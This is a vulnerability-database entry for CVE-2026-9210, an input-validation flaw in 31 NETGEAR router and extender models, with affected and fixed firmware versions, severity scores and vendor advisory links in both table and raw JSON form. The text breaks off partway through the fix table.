Search
Find a vulnerability
Search criteria
130 vulnerabilities found for R8500 by NETGEAR
CVE-2026-9210 (GCVE-0-2026-9210)
Vulnerability from nvd – Published: 2026-06-09 15:50 – Updated: 2026-06-11 05:38
VLAI
Title
Certain NETGEAR routers allow authenticated administrators to gain unintended control of the router
Summary
Insufficient input validation vulnerability in the listed NETGEAR models allows authenticated administrators connected to the local network to make unauthorized modification of router software and functionality.
Severity
SSVC
Exploitation: none
Automatable: no
Technical Impact: partial
CISA Coordinator (v2.0.3)
CWE
- CWE-20 - Improper input validation
Assigner
References
32 references
Impacted products
31 products
| Vendor | Product | Version | |
|---|---|---|---|
| NETGEAR | EX3700 |
Affected:
0 , < V1.0.0.100
(custom)
|
|
| NETGEAR | EX3800 |
Affected:
0 , < V1.0.0.100
(custom)
|
|
| NETGEAR | EX6120 |
Affected:
0 , < V1.0.0.72
(custom)
|
|
| NETGEAR | EX6130 |
Affected:
0 , < V1.0.0.54
(custom)
|
|
| NETGEAR | MR60 |
Affected:
0 , < V1.1.7.132
(custom)
|
|
| NETGEAR | MR70 |
Affected:
0 , < V1.0.3.28
(custom)
|
|
| NETGEAR | MR80 |
Affected:
0 , < V1.1.7.14
(custom)
|
|
| NETGEAR | MS60 |
Affected:
0 , < V1.1.7.132
(custom)
|
|
| NETGEAR | MS70 |
Affected:
0 , < V1.0.3.28
(custom)
|
|
| NETGEAR | MS80 |
Affected:
0 , < V1.1.7.14
(custom)
|
|
| NETGEAR | R6400v2 |
Affected:
0 , < V1.0.4.128
(custom)
|
|
| NETGEAR | R6700v3 |
Affected:
0 , < V1.0.4.128
(custom)
|
|
| NETGEAR | R6900P |
Affected:
0 , < V1.3.3.152
(custom)
|
|
| NETGEAR | R7000 |
Affected:
0 , < V1.0.11.216
(custom)
|
|
| NETGEAR | R7000P |
Affected:
0 , < V1.3.3.152
(custom)
|
|
| NETGEAR | R7960P |
Affected:
0 , < V1.4.4.92
(custom)
|
|
| NETGEAR | R8000P |
Affected:
0 , < V1.4.4.92
(custom)
|
|
| NETGEAR | R8500 |
Affected:
0 , ≤ 1.0.2.160
(custom)
|
|
| NETGEAR | RAX20 |
Affected:
0 , < V1.0.18.144
(custom)
|
|
| NETGEAR | RAX35v2 |
Affected:
0 , < V1.0.12.118
(custom)
|
|
| NETGEAR | RAX40v2 |
Affected:
0 , < V1.0.12.118
(custom)
|
|
| NETGEAR | RAX41 |
Affected:
0 , < V1.0.12.118
(custom)
|
|
| NETGEAR | RAX42 |
Affected:
0 , < V1.0.12.118
(custom)
|
|
| NETGEAR | RAX43 |
Affected:
0 , < V1.0.12.120
(custom)
|
|
| NETGEAR | RAX45 |
Affected:
0 , < V1.0.12.118
(custom)
|
|
| NETGEAR | RAX48 |
Affected:
0 , < V1.0.12.118
(custom)
|
|
| NETGEAR | RAX50 |
Affected:
0 , < V1.0.12.120
(custom)
|
|
| NETGEAR | RAX50S |
Affected:
0 , < V1.0.12.120
(custom)
|
|
| NETGEAR | RAXE450 |
Affected:
0 , < V1.0.10.86
(custom)
|
|
| NETGEAR | RAXE500 |
Affected:
0 , < V1.0.10.86
(custom)
|
|
| NETGEAR | XR1000 |
Affected:
0 , < V1.0.0.68
(custom)
|
Date Public
2026-06-09 00:00
Credits
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2026-9210",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2026-06-09T18:03:30.063423Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2026-06-09T18:39:39.151Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "EX3700",
"vendor": "NETGEAR",
"versions": [
{
"lessThan": "V1.0.0.100",
"status": "affected",
"version": "0",
"versionType": "custom"
}
]
},
{
"defaultStatus": "unaffected",
"product": "EX3800",
"vendor": "NETGEAR",
"versions": [
{
"lessThan": "V1.0.0.100",
"status": "affected",
"version": "0",
"versionType": "custom"
}
]
},
{
"defaultStatus": "unaffected",
"product": "EX6120",
"vendor": "NETGEAR",
"versions": [
{
"lessThan": "V1.0.0.72",
"status": "affected",
"version": "0",
"versionType": "custom"
}
]
},
{
"defaultStatus": "unaffected",
"product": "EX6130",
"vendor": "NETGEAR",
"versions": [
{
"lessThan": "V1.0.0.54",
"status": "affected",
"version": "0",
"versionType": "custom"
}
]
},
{
"defaultStatus": "unaffected",
"product": "MR60",
"vendor": "NETGEAR",
"versions": [
{
"lessThan": "V1.1.7.132",
"status": "affected",
"version": "0",
"versionType": "custom"
}
]
},
{
"defaultStatus": "unaffected",
"product": "MR70",
"vendor": "NETGEAR",
"versions": [
{
"lessThan": "V1.0.3.28",
"status": "affected",
"version": "0",
"versionType": "custom"
}
]
},
{
"defaultStatus": "unaffected",
"product": "MR80",
"vendor": "NETGEAR",
"versions": [
{
"lessThan": "V1.1.7.14",
"status": "affected",
"version": "0",
"versionType": "custom"
}
]
},
{
"defaultStatus": "unaffected",
"product": "MS60",
"vendor": "NETGEAR",
"versions": [
{
"lessThan": "V1.1.7.132",
"status": "affected",
"version": "0",
"versionType": "custom"
}
]
},
{
"defaultStatus": "unaffected",
"product": "MS70",
"vendor": "NETGEAR",
"versions": [
{
"lessThan": "V1.0.3.28",
"status": "affected",
"version": "0",
"versionType": "custom"
}
]
},
{
"defaultStatus": "unaffected",
"product": "MS80",
"vendor": "NETGEAR",
"versions": [
{
"lessThan": "V1.1.7.14",
"status": "affected",
"version": "0",
"versionType": "custom"
}
]
},
{
"defaultStatus": "unaffected",
"product": "R6400v2",
"vendor": "NETGEAR",
"versions": [
{
"lessThan": "V1.0.4.128",
"status": "affected",
"version": "0",
"versionType": "custom"
}
]
},
{
"defaultStatus": "unaffected",
"product": "R6700v3",
"vendor": "NETGEAR",
"versions": [
{
"lessThan": "V1.0.4.128",
"status": "affected",
"version": "0",
"versionType": "custom"
}
]
},
{
"defaultStatus": "unaffected",
"product": "R6900P",
"vendor": "NETGEAR",
"versions": [
{
"lessThan": "V1.3.3.152",
"status": "affected",
"version": "0",
"versionType": "custom"
}
]
},
{
"defaultStatus": "unaffected",
"product": "R7000",
"vendor": "NETGEAR",
"versions": [
{
"lessThan": "V1.0.11.216",
"status": "affected",
"version": "0",
"versionType": "custom"
}
]
},
{
"defaultStatus": "unaffected",
"product": "R7000P",
"vendor": "NETGEAR",
"versions": [
{
"lessThan": "V1.3.3.152",
"status": "affected",
"version": "0",
"versionType": "custom"
}
]
},
{
"defaultStatus": "unaffected",
"product": "R7960P",
"vendor": "NETGEAR",
"versions": [
{
"lessThan": "V1.4.4.92",
"status": "affected",
"version": "0",
"versionType": "custom"
}
]
},
{
"defaultStatus": "unaffected",
"product": "R8000P",
"vendor": "NETGEAR",
"versions": [
{
"lessThan": "V1.4.4.92",
"status": "affected",
"version": "0",
"versionType": "custom"
}
]
},
{
"defaultStatus": "unaffected",
"product": "R8500",
"vendor": "NETGEAR",
"versions": [
{
"lessThanOrEqual": "1.0.2.160",
"status": "affected",
"version": "0",
"versionType": "custom"
}
]
},
{
"defaultStatus": "unaffected",
"product": "RAX20",
"vendor": "NETGEAR",
"versions": [
{
"lessThan": "V1.0.18.144",
"status": "affected",
"version": "0",
"versionType": "custom"
}
]
},
{
"defaultStatus": "unaffected",
"product": "RAX35v2",
"vendor": "NETGEAR",
"versions": [
{
"lessThan": "V1.0.12.118",
"status": "affected",
"version": "0",
"versionType": "custom"
}
]
},
{
"defaultStatus": "unaffected",
"product": "RAX40v2",
"vendor": "NETGEAR",
"versions": [
{
"lessThan": "V1.0.12.118",
"status": "affected",
"version": "0",
"versionType": "custom"
}
]
},
{
"defaultStatus": "unaffected",
"product": "RAX41",
"vendor": "NETGEAR",
"versions": [
{
"lessThan": "V1.0.12.118",
"status": "affected",
"version": "0",
"versionType": "custom"
}
]
},
{
"defaultStatus": "unaffected",
"product": "RAX42",
"vendor": "NETGEAR",
"versions": [
{
"lessThan": "V1.0.12.118",
"status": "affected",
"version": "0",
"versionType": "custom"
}
]
},
{
"defaultStatus": "unaffected",
"product": "RAX43",
"vendor": "NETGEAR",
"versions": [
{
"lessThan": "V1.0.12.120",
"status": "affected",
"version": "0",
"versionType": "custom"
}
]
},
{
"defaultStatus": "unaffected",
"product": "RAX45",
"vendor": "NETGEAR",
"versions": [
{
"lessThan": "V1.0.12.118",
"status": "affected",
"version": "0",
"versionType": "custom"
}
]
},
{
"defaultStatus": "unaffected",
"product": "RAX48",
"vendor": "NETGEAR",
"versions": [
{
"lessThan": "V1.0.12.118",
"status": "affected",
"version": "0",
"versionType": "custom"
}
]
},
{
"defaultStatus": "unaffected",
"product": "RAX50",
"vendor": "NETGEAR",
"versions": [
{
"lessThan": "V1.0.12.120",
"status": "affected",
"version": "0",
"versionType": "custom"
}
]
},
{
"defaultStatus": "unaffected",
"product": "RAX50S",
"vendor": "NETGEAR",
"versions": [
{
"lessThan": "V1.0.12.120",
"status": "affected",
"version": "0",
"versionType": "custom"
}
]
},
{
"defaultStatus": "unaffected",
"product": "RAXE450",
"vendor": "NETGEAR",
"versions": [
{
"lessThan": "V1.0.10.86",
"status": "affected",
"version": "0",
"versionType": "custom"
}
]
},
{
"defaultStatus": "unaffected",
"product": "RAXE500",
"vendor": "NETGEAR",
"versions": [
{
"lessThan": "V1.0.10.86",
"status": "affected",
"version": "0",
"versionType": "custom"
}
]
},
{
"defaultStatus": "unaffected",
"product": "XR1000",
"vendor": "NETGEAR",
"versions": [
{
"lessThan": "V1.0.0.68",
"status": "affected",
"version": "0",
"versionType": "custom"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:ex3700:*:*:*:*:*:*:*:*",
"versionEndExcluding": "v1.0.0.100",
"versionStartIncluding": "0",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:ex3800:*:*:*:*:*:*:*:*",
"versionEndExcluding": "v1.0.0.100",
"versionStartIncluding": "0",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:ex6120:*:*:*:*:*:*:*:*",
"versionEndExcluding": "v1.0.0.72",
"versionStartIncluding": "0",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:ex6130:*:*:*:*:*:*:*:*",
"versionEndExcluding": "v1.0.0.54",
"versionStartIncluding": "0",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:mr60:*:*:*:*:*:*:*:*",
"versionEndExcluding": "v1.1.7.132",
"versionStartIncluding": "0",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:mr70:*:*:*:*:*:*:*:*",
"versionEndExcluding": "v1.0.3.28",
"versionStartIncluding": "0",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:mr80:*:*:*:*:*:*:*:*",
"versionEndExcluding": "v1.1.7.14",
"versionStartIncluding": "0",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:ms60:*:*:*:*:*:*:*:*",
"versionEndExcluding": "v1.1.7.132",
"versionStartIncluding": "0",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:ms70:*:*:*:*:*:*:*:*",
"versionEndExcluding": "v1.0.3.28",
"versionStartIncluding": "0",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:ms80:*:*:*:*:*:*:*:*",
"versionEndExcluding": "v1.1.7.14",
"versionStartIncluding": "0",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r6400v2:*:*:*:*:*:*:*:*",
"versionEndExcluding": "v1.0.4.128",
"versionStartIncluding": "0",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r6700v3:*:*:*:*:*:*:*:*",
"versionEndExcluding": "v1.0.4.128",
"versionStartIncluding": "0",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r6900p:*:*:*:*:*:*:*:*",
"versionEndExcluding": "v1.3.3.152",
"versionStartIncluding": "0",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r7000:*:*:*:*:*:*:*:*",
"versionEndExcluding": "v1.0.11.216",
"versionStartIncluding": "0",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r7000p:*:*:*:*:*:*:*:*",
"versionEndExcluding": "v1.3.3.152",
"versionStartIncluding": "0",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r7960p:*:*:*:*:*:*:*:*",
"versionEndExcluding": "v1.4.4.92",
"versionStartIncluding": "0",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r8000p:*:*:*:*:*:*:*:*",
"versionEndExcluding": "v1.4.4.92",
"versionStartIncluding": "0",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r8500:*:*:*:*:*:*:*:*",
"versionEndIncluding": "*",
"versionStartIncluding": "0",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:rax20:*:*:*:*:*:*:*:*",
"versionEndExcluding": "v1.0.18.144",
"versionStartIncluding": "0",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:rax35v2:*:*:*:*:*:*:*:*",
"versionEndExcluding": "v1.0.12.118",
"versionStartIncluding": "0",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:rax40v2:*:*:*:*:*:*:*:*",
"versionEndExcluding": "v1.0.12.118",
"versionStartIncluding": "0",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:rax41:*:*:*:*:*:*:*:*",
"versionEndExcluding": "v1.0.12.118",
"versionStartIncluding": "0",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:rax42:*:*:*:*:*:*:*:*",
"versionEndExcluding": "v1.0.12.118",
"versionStartIncluding": "0",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:rax43:*:*:*:*:*:*:*:*",
"versionEndExcluding": "v1.0.12.120",
"versionStartIncluding": "0",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:rax45:*:*:*:*:*:*:*:*",
"versionEndExcluding": "v1.0.12.118",
"versionStartIncluding": "0",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:rax48:*:*:*:*:*:*:*:*",
"versionEndExcluding": "v1.0.12.118",
"versionStartIncluding": "0",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:rax50:*:*:*:*:*:*:*:*",
"versionEndExcluding": "v1.0.12.120",
"versionStartIncluding": "0",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:rax50s:*:*:*:*:*:*:*:*",
"versionEndExcluding": "v1.0.12.120",
"versionStartIncluding": "0",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:raxe450:*:*:*:*:*:*:*:*",
"versionEndExcluding": "v1.0.10.86",
"versionStartIncluding": "0",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:raxe500:*:*:*:*:*:*:*:*",
"versionEndExcluding": "v1.0.10.86",
"versionStartIncluding": "0",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:xr1000:*:*:*:*:*:*:*:*",
"versionEndExcluding": "v1.0.0.68",
"versionStartIncluding": "0",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "OR"
}
],
"credits": [
{
"lang": "en",
"type": "finder",
"value": "pjqwudi"
}
],
"datePublic": "2026-06-09T00:00:00.000Z",
"descriptions": [
{
"lang": "en",
"supportingMedia": [
{
"base64": false,
"type": "text/html",
"value": "\u003cdiv\u003e\u003cp\u003eInsufficient input validation vulnerability in the\u0026nbsp;listed NETGEAR models allows\u0026nbsp;authenticated administrators connected to the local network to make unauthorized modification of router software and functionality.\u003c/p\u003e\u003c/div\u003e"
}
],
"value": "Insufficient input validation vulnerability in the\u00a0listed NETGEAR models allows\u00a0authenticated administrators connected to the local network to make unauthorized modification of router software and functionality."
}
],
"impacts": [
{
"capecId": "CAPEC-122",
"descriptions": [
{
"lang": "en",
"value": "CAPEC-122 Privilege Abuse"
}
]
}
],
"metrics": [
{
"cvssV4_0": {
"Automatable": "NOT_DEFINED",
"Recovery": "NOT_DEFINED",
"Safety": "NOT_DEFINED",
"attackComplexity": "LOW",
"attackRequirements": "NONE",
"attackVector": "ADJACENT",
"baseScore": 4.9,
"baseSeverity": "MEDIUM",
"exploitMaturity": "UNREPORTED",
"privilegesRequired": "NONE",
"providerUrgency": "AMBER",
"subAvailabilityImpact": "NONE",
"subConfidentialityImpact": "NONE",
"subIntegrityImpact": "NONE",
"userInteraction": "NONE",
"valueDensity": "DIFFUSE",
"vectorString": "CVSS:4.0/AV:A/AC:L/AT:N/PR:N/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N/E:U/V:D/RE:L/U:Amber",
"version": "4.0",
"vulnAvailabilityImpact": "NONE",
"vulnConfidentialityImpact": "NONE",
"vulnIntegrityImpact": "HIGH",
"vulnerabilityResponseEffort": "LOW"
},
"format": "CVSS",
"scenarios": [
{
"lang": "en",
"value": "GENERAL"
}
]
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-20",
"description": "CWE-20 Improper input validation",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2026-06-11T05:38:03.646Z",
"orgId": "a2826606-91e7-4eb6-899e-8484bd4575d5",
"shortName": "NETGEAR"
},
"references": [
{
"tags": [
"product",
"patch"
],
"url": "https://www.netgear.com/support/product/ex3700/"
},
{
"tags": [
"product",
"patch"
],
"url": "https://www.netgear.com/support/product/ex3800/"
},
{
"tags": [
"product",
"patch"
],
"url": "https://www.netgear.com/support/product/ex6120/"
},
{
"tags": [
"product",
"patch"
],
"url": "https://www.netgear.com/support/product/mr60/"
},
{
"tags": [
"product",
"patch"
],
"url": "https://www.netgear.com/support/product/ex6130/"
},
{
"tags": [
"product",
"patch"
],
"url": "https://www.netgear.com/support/product/ms70/"
},
{
"tags": [
"product",
"patch"
],
"url": "https://www.netgear.com/support/product/ms60/"
},
{
"tags": [
"product",
"patch"
],
"url": "https://www.netgear.com/support/product/mr80/"
},
{
"tags": [
"product",
"patch"
],
"url": "https://www.netgear.com/support/product/ms80/"
},
{
"tags": [
"product",
"patch"
],
"url": "https://www.netgear.com/support/product/mr70/"
},
{
"tags": [
"product",
"patch"
],
"url": "https://www.netgear.com/support/product/r6400v2/"
},
{
"tags": [
"product",
"patch"
],
"url": "https://www.netgear.com/support/product/r6700v3/"
},
{
"tags": [
"product",
"patch"
],
"url": "https://www.netgear.com/support/product/r6900p/"
},
{
"tags": [
"product",
"patch"
],
"url": "https://www.netgear.com/support/product/r7960p/"
},
{
"tags": [
"product",
"patch"
],
"url": "https://www.netgear.com/support/product/r7000p/"
},
{
"tags": [
"product",
"patch"
],
"url": "https://www.netgear.com/support/product/r8000p/"
},
{
"tags": [
"product"
],
"url": "https://www.netgear.com/support/product/r8500/"
},
{
"tags": [
"product",
"patch"
],
"url": "https://www.netgear.com/support/product/rax48/"
},
{
"tags": [
"product",
"patch"
],
"url": "https://www.netgear.com/support/product/r7000/"
},
{
"tags": [
"product",
"patch"
],
"url": "https://www.netgear.com/support/product/rax40v2/"
},
{
"tags": [
"product",
"patch"
],
"url": "https://www.netgear.com/support/product/rax20/"
},
{
"tags": [
"product",
"patch"
],
"url": "https://www.netgear.com/support/product/rax35v2/"
},
{
"tags": [
"product",
"patch"
],
"url": "https://www.netgear.com/support/product/rax41/"
},
{
"tags": [
"product",
"patch"
],
"url": "https://www.netgear.com/support/product/rax42/"
},
{
"tags": [
"product",
"patch"
],
"url": "https://www.netgear.com/support/product/rax45/"
},
{
"tags": [
"product",
"patch"
],
"url": "https://www.netgear.com/support/product/rax50/"
},
{
"tags": [
"product",
"patch"
],
"url": "https://www.netgear.com/support/product/rax43/"
},
{
"tags": [
"product",
"patch"
],
"url": "https://www.netgear.com/support/product/rax50s/"
},
{
"tags": [
"product",
"patch"
],
"url": "https://www.netgear.com/support/product/raxe450/"
},
{
"tags": [
"product",
"patch"
],
"url": "https://www.netgear.com/support/product/raxe500/"
},
{
"tags": [
"product",
"patch"
],
"url": "https://www.netgear.com/support/product/xr1000/"
},
{
"tags": [
"vendor-advisory"
],
"url": "https://kb.netgear.com/000070811/June-2026-NETGEAR-Security-Advisory"
}
],
"solutions": [
{
"lang": "en",
"supportingMedia": [
{
"base64": false,
"type": "text/html",
"value": "\u003cp\u003eDevices with automatic updates enabled may already have this patch applied. If not, please check the firmware version and update it to the latest. Fixed in:\u003c/p\u003e\u003ctable\u003e\u003cthead\u003e\u003ctr\u003e\u003cth\u003eProduct\u003c/th\u003e\u003cth\u003eFixed Version\u003c/th\u003e\u003c/tr\u003e\u003c/thead\u003e\u003ctbody\u003e\u003ctr\u003e\u003ctd\u003e\u003cb\u003eEX3700\u003c/b\u003e AC750 WiFi Range Extender Essentials Edition\u003c/td\u003e\u003ctd\u003e\u003ca href=\"https://www.netgear.com/support/product/ex3700/\"\u003eV1.0.0.100\u003c/a\u003e\u003c/td\u003e\u003c/tr\u003e\u003ctr\u003e\u003ctd\u003e\u003cb\u003eEX3800 (EoS)\u003c/b\u003e AC750 WiFi Range Extender Essentials Edition\u003c/td\u003e\u003ctd\u003e\u003ca href=\"https://www.netgear.com/support/product/ex3800/\"\u003eV1.0.0.100\u003c/a\u003e\u003c/td\u003e\u003c/tr\u003e\u003ctr\u003e\u003ctd\u003e\u003cb\u003eEX6120\u003c/b\u003e AC1200 Dual Band WiFi Range Extender\u003c/td\u003e\u003ctd\u003e\u003ca href=\"https://www.netgear.com/support/product/ex6120/\"\u003eV1.0.0.72\u003c/a\u003e\u003c/td\u003e\u003c/tr\u003e\u003ctr\u003e\u003ctd\u003e\u003cb\u003eEX6130\u003c/b\u003e AC1200 WiFi Range Extender\u003c/td\u003e\u003ctd\u003e\u003ca href=\"https://www.netgear.com/support/product/ex6130/\"\u003eV1.0.0.54\u003c/a\u003e\u003c/td\u003e\u003c/tr\u003e\u003ctr\u003e\u003ctd\u003e\u003cb\u003eMR60\u003c/b\u003e Nighthawk Mesh WiFi 6 Router\u003c/td\u003e\u003ctd\u003e\u003ca href=\"https://www.netgear.com/support/product/mr60/\"\u003eV1.1.7.132\u003c/a\u003e\u003c/td\u003e\u003c/tr\u003e\u003ctr\u003e\u003ctd\u003e\u003cb\u003eMR70\u003c/b\u003e Nighthawk Mesh WiFi 6 Router\u003c/td\u003e\u003ctd\u003e\u003ca href=\"https://www.netgear.com/support/product/mr70/\"\u003eV1.0.3.28\u003c/a\u003e\u003c/td\u003e\u003c/tr\u003e\u003ctr\u003e\u003ctd\u003e\u003cb\u003eMR80\u003c/b\u003e Nighthawk Tri-band Mesh WiFi 6 Router\u003c/td\u003e\u003ctd\u003e\u003ca href=\"https://www.netgear.com/support/product/mr80/\"\u003eV1.1.7.14\u003c/a\u003e\u003c/td\u003e\u003c/tr\u003e\u003ctr\u003e\u003ctd\u003e\u003cb\u003eMS60\u003c/b\u003e Nighthawk Mesh WiFi 6 Add-on Satellite\u003c/td\u003e\u003ctd\u003e\u003ca href=\"https://www.netgear.com/support/product/ms60/\"\u003eV1.1.7.132\u003c/a\u003e\u003c/td\u003e\u003c/tr\u003e\u003ctr\u003e\u003ctd\u003e\u003cb\u003eMS70\u003c/b\u003e Nighthawk Mesh WiFi 6 Add-on Satellite\u003c/td\u003e\u003ctd\u003e\u003ca href=\"https://www.netgear.com/support/product/ms70/\"\u003eV1.0.3.28\u003c/a\u003e\u003c/td\u003e\u003c/tr\u003e\u003ctr\u003e\u003ctd\u003e\u003cb\u003eMS80\u003c/b\u003e Nighthawk Tri-band Mesh WiFi 6 Add-on Satellite\u003c/td\u003e\u003ctd\u003e\u003ca href=\"https://www.netgear.com/support/product/ms80/\"\u003eV1.1.7.14\u003c/a\u003e\u003c/td\u003e\u003c/tr\u003e\u003ctr\u003e\u003ctd\u003e\u003cb\u003eR6400v2 (EoS)\u003c/b\u003e AC1750 Smart WiFi Router 802.11ac Dual Band Gigabit\u003c/td\u003e\u003ctd\u003e\u003ca href=\"https://www.netgear.com/support/product/r6400v2/\"\u003eV1.0.4.128\u003c/a\u003e\u003c/td\u003e\u003c/tr\u003e\u003ctr\u003e\u003ctd\u003e\u003cb\u003eR6700v3 (EoS)\u003c/b\u003e Nighthawk AC1750 Smart WiFi Dual Band Gigabit Router\u003c/td\u003e\u003ctd\u003e\u003ca href=\"https://www.netgear.com/support/product/r6700v3/\"\u003eV1.0.4.128\u003c/a\u003e\u003c/td\u003e\u003c/tr\u003e\u003ctr\u003e\u003ctd\u003e\u003cb\u003eR6900P (EoS)\u003c/b\u003e Nighthawk AC1900 Smart WiFi Dual Band Gigabit Router\u003c/td\u003e\u003ctd\u003e\u003ca href=\"https://www.netgear.com/support/product/r6900p/\"\u003eV1.3.3.152\u003c/a\u003e\u003c/td\u003e\u003c/tr\u003e\u003ctr\u003e\u003ctd\u003e\u003cb\u003eR7000 (EoS)\u003c/b\u003e Nighthawk AC1900 Smart WiFi Dual Band Gigabit Router\u003c/td\u003e\u003ctd\u003e\u003ca href=\"https://www.netgear.com/support/product/r7000/\"\u003eV1.0.11.216\u003c/a\u003e\u003c/td\u003e\u003c/tr\u003e\u003ctr\u003e\u003ctd\u003e\u003cb\u003eR7000P (EoS)\u003c/b\u003e Nighthawk AC2300 Smart WiFi Dual Band Gigabit Router\u003c/td\u003e\u003ctd\u003e\u003ca href=\"https://www.netgear.com/support/product/r7000p/\"\u003eV1.3.3.152\u003c/a\u003e\u003c/td\u003e\u003c/tr\u003e\u003ctr\u003e\u003ctd\u003e\u003cb\u003eR7960P (EoS)\u003c/b\u003e Nighthawk X6S AC3600 Tri-Band WiFi Router\u003c/td\u003e\u003ctd\u003e\u003ca href=\"https://www.netgear.com/support/product/r7960p/\"\u003eV1.4.4.92\u003c/a\u003e\u003c/td\u003e\u003c/tr\u003e\u003ctr\u003e\u003ctd\u003e\u003cb\u003eR8000P (EoS)\u003c/b\u003e Nighthawk X6S AC4000 Tri Band WiFi Router\u003c/td\u003e\u003ctd\u003e\u003ca href=\"https://www.netgear.com/support/product/r8000p/\"\u003eV1.4.4.92\u003c/a\u003e\u003c/td\u003e\u003c/tr\u003e\u003ctr\u003e\u003ctd\u003e\u003cb\u003eR8500 (EoS)\u003c/b\u003e Nighthawk X8 AC5300 Smart WiFi Router\u003c/td\u003e\u003ctd\u003eEOS\u003c/td\u003e\u003c/tr\u003e\u003ctr\u003e\u003ctd\u003e\u003cb\u003eRAX20 (EoS)\u003c/b\u003e 4-Stream AX1800 WiFi 6 Router\u003c/td\u003e\u003ctd\u003e\u003ca href=\"https://www.netgear.com/support/product/rax20/\"\u003eV1.0.18.144\u003c/a\u003e\u003c/td\u003e\u003c/tr\u003e\u003ctr\u003e\u003ctd\u003e\u003cb\u003eRAX35v2\u003c/b\u003e Nighthawk AX4 4-Stream AX3000 WiFi 6 Router\u003c/td\u003e\u003ctd\u003e\u003ca href=\"https://www.netgear.com/support/product/rax35v2/\"\u003eV1.0.12.118\u003c/a\u003e\u003c/td\u003e\u003c/tr\u003e\u003ctr\u003e\u003ctd\u003e\u003cb\u003eRAX40v2\u003c/b\u003e Nighthawk AX4 4-Stream WiFi Router\u003c/td\u003e\u003ctd\u003e\u003ca href=\"https://www.netgear.com/support/product/rax40v2/\"\u003eV1.0.12.118\u003c/a\u003e\u003c/td\u003e\u003c/tr\u003e\u003ctr\u003e\u003ctd\u003e\u003cb\u003eRAX41 (EoS)\u003c/b\u003e Nighthawk AX5 5-Stream AX3600 WiFi Router\u003c/td\u003e\u003ctd\u003e\u003ca 